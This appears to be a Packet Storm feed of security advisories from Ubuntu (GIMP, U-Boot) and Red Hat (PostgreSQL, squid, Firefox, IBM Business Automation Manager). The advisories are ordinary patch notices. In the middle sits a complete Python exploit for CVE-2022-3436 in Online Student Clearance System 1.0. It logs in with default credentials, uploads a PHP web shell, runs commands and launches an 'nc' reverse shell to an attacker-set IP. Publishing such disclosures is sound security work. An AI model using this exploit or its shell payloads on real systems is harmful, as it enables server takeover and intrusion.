Ubuntu Security Notice 6521-1 - It was discovered that GIMP incorrectly handled certain image files. If a user were tricked into opening a specially crafted image, an attacker could use this issue to cause GIMP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6521-1November 29, 2023gimp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:GIMP could be made to crash or run programs as your login if itopened a specially crafted file.Software Description:- gimp: GNU Image Manipulation ProgramDetails:It was discovered that GIMP incorrectly handled certain image files. If auser were tricked into opening a specially crafted image, an attacker coulduse this issue to cause GIMP to crash, resulting in a denial of service, orpossibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   gimp                            2.10.34-1ubuntu0.23.10.1Ubuntu 23.04:   gimp                            2.10.34-1ubuntu0.23.04.1Ubuntu 22.04 LTS:   gimp                            2.10.30-1ubuntu0.1Ubuntu 20.04 LTS:   gimp                            2.10.18-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6521-1   CVE-2022-30067, CVE-2022-32990, CVE-2023-44441, CVE-2023-44442,   CVE-2023-44443, CVE-2023-44444Package Information:   https://launchpad.net/ubuntu/+source/gimp/2.10.34-1ubuntu0.23.10.1   https://launchpad.net/ubuntu/+source/gimp/2.10.34-1ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/gimp/2.10.30-1ubuntu0.1   https://launchpad.net/ubuntu/+source/gimp/2.10.18-1ubuntu0.1

Ubuntu Security Notice USN-6521-1

Ubuntu Security Notice 6523-1 - It was discovered that U-Boot incorrectly handled certain USB DFU download setup packets. A local attacker could use this issue to cause U-Boot to crash, resulting in a denial of service, or possibly execute arbitrary code. Nicolas Bidron and Nicolas Guigo discovered that U-Boot incorrectly handled certain fragmented IP packets. A local attacker could use this issue to cause U-Boot to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6523-1November 29, 2023u-boot-nezha vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in u-boot-nezha.Software Description:- u-boot-nezha: U-Boot for Allwinner Nezha boardDetails:It was discovered that U-Boot incorrectly handled certain USB DFU downloadsetup packets. A local attacker could use this issue to cause U-Boot tocrash, resulting in a denial of service, or possibly execute arbitrarycode. (CVE-2022-2347)Nicolas Bidron and Nicolas Guigo discovered that U-Boot incorrectly handledcertain fragmented IP packets. A local attacker could use this issue tocause U-Boot to crash, resulting in a denial of service, or possiblyexecute arbitrary code. (CVE-2022-30552, CVE-2022-30790)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   u-boot-nezha                    2022.10-1089-g528ae9bc6c-0ubuntu1.23.04.2Ubuntu 22.04 LTS:   u-boot-nezha                    2022.04+git20220405.7446a472-0ubuntu0.4In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6523-1   CVE-2022-2347, CVE-2022-30552, CVE-2022-30790Package Information: https://launchpad.net/ubuntu/+source/u-boot-nezha/2022.10-1089-g528ae9bc6c-0ubuntu1.23.04.2 https://launchpad.net/ubuntu/+source/u-boot-nezha/2022.04+git20220405.7446a472-0ubuntu0.4

Ubuntu Security Notice USN-6523-1

Online Student Clearance System versions 1.0 and below suffer from a remote shell upload vulnerability.

#!/usr/bin/python3

# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)  
# Date: 28/11/2023  
# Exploit Author: Akash Pandey aka l3v1ath0n  
# Version: <= 1.0  
# Tested on: Kali Linux  
# CVE : CVE-2022-3436

import requests  
import time  
import os

print("""

                     ____   ___ ____  ____      _____ _  _  _____  __     
  _____   _____     |___ \ / _ \___ \|___ \    |___ /| || ||___ / / /_    
 / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \   
| (__ \ V /  __/_____/ __/| |_| / __/ / __/_____|__) |__   _|__) | (_) |  
 \___| \_/ \___|    |_____|\___/_____|_____|   |____/   |_||____/ \___/ 

                                                                                                                                              Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:  
Twitter: https://twitter.com/_l3v1ath0n  
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/  
""")

web_url = "http://192.168.1.26/student/" # Edit this as per your need  
username = "18/132010" # Default Username  
password = "11111111" # Default Password  
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell  
local_port = "1337" # Port of local machine to connect reverse shell on...  
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"

# Firing request to login  
log_url = web_url+"login.php"

#Telling script to use previous session  
session = requests.Session()

#Post Body Data for login  
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}

#Sending request to web server with required post data  
response = session.post(log_url,data=post_data)

# Checking Login if Successful:  
time.sleep(1)

# Creating a shell file in current directory  
print("[i] Creating a shell file to upload.")

with open("shell.php","w") as file:  
    file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")  
    file.close()  
time.sleep(1)

print("[i] Checking Login.")

if response.history:  
    print("[+] Login Successful.")

    time.sleep(1)

    print("[i] Uploading Shell.")

    # Step 1: Reads the shell.php file in current folder  
    # Step 2: Stores the content in filename called shell.php  
    # Step 3: Uses the variable name userImage to upload file to server.  
    file = {'userImage':('shell.php',open("shell.php","rb"))}

        # Sending payload as POST data to shell.php file  
    payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}

    # Uploading the malicious php file at below path using files and data values   
    upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)  
    print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")  
    while True:  
        command = input("l3v1ath0n㉿CVE-2022-3436: ")  
        if command == "exit":  
            break  
        elif command == "netcat":  
            print("[!] Don't forget to start Netcat Listener")  
            time.sleep(3)  
            payload = {'cmd':rev_shell}  
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)  
            print(cmd.text)  
        else:  
            payload = {'cmd':command}  
            cmd = session.get(web_url+"uploads/shell.php?",params=payload)  
            print(cmd.text)

    print("\n[i] Closing this Session")  
    session.close()

else:  
    print("[-] Login Failed.")

Online Student Clearance System 1.0 Shell Upload

Red Hat Security Advisory 2023-7587-01 - An update is now available for IBM Business Automation Manager Open Editions including images for Red Hat OpenShift Container Platform. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7587.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Updated IBM Business Automation Manager Open Editions 8.0.4 SP1 Images  
Advisory ID:        RHSA-2023:7587-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7587  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-44487  
====================================================================

Summary: 

An update is now available for IBM Business Automation Manager Open Editions including images for Red Hat OpenShift Container Platform.

Description:

IBM Business Automation Manager Open Editions is an open source business process management suite that combines process management and decision service management. It enables business and IT users to create, manage, validate, and deploy process applications and decision services.

IBM Business Automation Manager Open Editions images have been provided for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) and for on-premise or private-cloud deployments.

This release updates the IBM Business Automation Manager Open Editions images to 8.0.4.

This release includes security fixes.

Security Fix(es):

* netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* Quarkus: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP XP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* businessautomation-operator: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.

For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.

Solution:

CVEs:

CVE-2023-44487

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7587-01

Red Hat Security Advisory 2023-7581-01 - An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7581.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:13 security update  
Advisory ID:        RHSA-2023:7581-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7581  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7581-01

Red Hat Security Advisory 2023-7580-01 - An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7580.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:13 security update  
Advisory ID:        RHSA-2023:7580-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7580  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2022-2625  
====================================================================

Summary: 

An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes (CVE-2023-2454)

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Extension scripts replace objects not belonging to the extension. (CVE-2022-2625)

* postgresql: row security policies disregard user ID changes after inlining. (CVE-2023-2455)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Client memory disclosure when connecting with Kerberos to modified server (CVE-2022-41862)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-2625

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2113825  
https://bugzilla.redhat.com/show_bug.cgi?id=2165722  
https://bugzilla.redhat.com/show_bug.cgi?id=2207568  
https://bugzilla.redhat.com/show_bug.cgi?id=2207569  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7580-01

Red Hat Security Advisory 2023-7579-01 - An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7579.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:13 security update  
Advisory ID:        RHSA-2023:7579-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7579  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7579-01

Red Hat Security Advisory 2023-7578-01 - An update for squid is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7578.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: squid security updateAdvisory ID:        RHSA-2023:7578-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7578Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-46847====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in HTTP Digest Authentication (CVE-2023-46847)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46847References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2245916

Red Hat Security Advisory 2023-7578-01

Red Hat Security Advisory 2023-7577-01 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7577.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2023:7577-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7577  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.5.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7577-01

Red Hat Security Advisory 2023-7576-01 - An update for squid is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7576.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: squid security updateAdvisory ID:        RHSA-2023:7576-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7576Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-46847====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in HTTP Digest Authentication (CVE-2023-46847)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46847References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2245916

Source

Packet Storm